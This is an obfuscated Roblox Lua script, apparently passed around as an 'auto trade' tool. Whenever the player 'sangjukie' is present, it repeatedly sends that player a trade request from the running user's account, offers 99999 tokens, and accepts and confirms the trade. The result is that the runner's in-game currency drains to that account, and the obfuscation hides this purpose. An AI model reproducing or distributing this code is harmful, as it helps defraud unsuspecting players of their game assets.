--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=10;local v2=7;local v3=936 -(857 + 74) ;local v4=573 -(367 + 201) ;local v5=100926 -(214 + 713) ;local v6=game:GetService("Players");local v7=game:GetService("ReplicatedStorage");local v8=v6.LocalPlayer;local v9=v7:WaitForChild("GameEvents"):WaitForChild("TradeEvents");local v10=false;local function v11() local v19=v8.Character or v8.CharacterAdded:Wait() ;local v20=v19:WaitForChild("Humanoid");for v31,v32 in ipairs(v8.Backpack:GetChildren()) do if (v32:IsA("Tool") and v32.Name:find("Trading Ticket")) then v20:EquipTool(v32);break;end end end local function v12() local v21=0 + 0 ;local v22;local v23;while true do if (v21==(0 + 0)) then v22=v8.Character;if  not v22 then return;end v21=878 -(282 + 595) ;end if (v21==(1638 -(1523 + 114))) then v23=v22:FindFirstChildOfClass("Humanoid");if v23 then v23:UnequipTools();end break;end end end local v13=game:GetService("GuiService");local v13=game:GetService("GuiService");local v14=game:GetService("VirtualInputManager");local function v15() local v24=v8:WaitForChild("PlayerGui");local v25=v24:WaitForChild("Teleport_UI"):WaitForChild("TradePlaza"):WaitForChild("Booth");v13.SelectedObject=v25;task.wait(0.2 + 0 );v13:Select(v25);task.wait(0.2 -0 );v14:SendKeyEvent(true,Enum.KeyCode.Return,false,game);v14:SendKeyEvent(false,Enum.KeyCode.Return,false,game);end local function v16() local v27=1065 -(68 + 997) ;while true do if (v27==(1270 -(226 + 1044))) then while v10 do local v34=v6:FindFirstChild(v0);if  not v34 then v10=false;break;end v15();task.wait(87 -67 );v11();task.wait(118 -(32 + 85) );v9.SendRequest:FireServer(v34);task.wait(1);v12();task.wait(2 + 0 );v9.SetTokens:FireServer(v5);task.wait(2 + 5 );v9.Accept:FireServer();task.wait(6);v9.Confirm:FireServer();end print("[AUTO TRADE] STOPPED");break;end end end local function v17() if v10 then return;end v10=true;print("[AUTO TRADE] START");task.spawn(v16);end local function v18() local v28=957 -(892 + 65) ;while true do if (v28==(0 -0)) then v10=false;print("[AUTO TRADE] STOP");break;end end end if v6:FindFirstChild(v0) then v17();end v6.PlayerAdded:Connect(function(v29) if (v29.Name==v0) then v17();end end);v6.PlayerRemoving:Connect(function(v30) if (v30.Name==v0) then v18();end end);
